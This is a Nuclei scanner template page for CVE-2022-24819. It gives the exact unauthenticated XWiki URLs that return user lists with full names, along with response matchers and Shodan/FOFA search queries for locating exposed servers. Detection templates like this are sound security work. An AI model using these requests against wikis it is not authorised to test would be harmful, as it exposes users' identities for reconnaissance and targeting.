Skip to content
Nuclei Templates

XWiki < 12.10.11, 13.4.4 & 13.9-rc-1 - Information Disclosure

ID: CVE-2022-24819

Severity: medium

Author: ritikchaddha

Tags: cve,cve2022,xwiki,exposure

Description

Section titled “Description”

An unauthenticated user can retrieve a list of users and their full names through a publicly accessible URL in XWiki. The issue affects versions before 12.10.11, 13.4.4, and 13.9-rc-1.

YAML Source

Section titled “YAML Source”
id: CVE-2022-24819


info:
  name: XWiki < 12.10.11, 13.4.4 & 13.9-rc-1 - Information Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    An unauthenticated user can retrieve a list of users and their full names through a publicly accessible URL in XWiki. The issue affects versions before 12.10.11, 13.4.4, and 13.9-rc-1.
  impact: |
    Information disclosure could lead to unauthorized access to sensitive data.
  remediation: |
    Upgrade XWiki to the latest version to mitigate CVE-2022-24819.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-97jg-43c9-q6pf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-24819
    cwe-id: CWE-359
    epss-score: 0.00068
    epss-percentile: 0.28844
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2022,xwiki,exposure


http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki=&media=json"
      - "{{BaseURL}}/xwiki/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki=&media=json"


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "value\":", "label\":", "icon\":")'
          - 'contains_all(body, "<results>", "<rs id=", "icon=\"")'
        condition: or


      - type: dsl
        dsl:
          - 'contains_any(content_type, "application/json", "text/xml")'
          - "status_code == 401 || status_code_2 == 200"
        condition: and
# digest: 4b0a0048304602210081a3cd4310aca86a5318e1d7b2512d1ada582914d82ecd27056fa86d8f56e0ad022100d1b1a8781c0b001038550b571ec9f2484eac0244dd4cb129cd144f5849b681b2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24819.yaml"

View on Github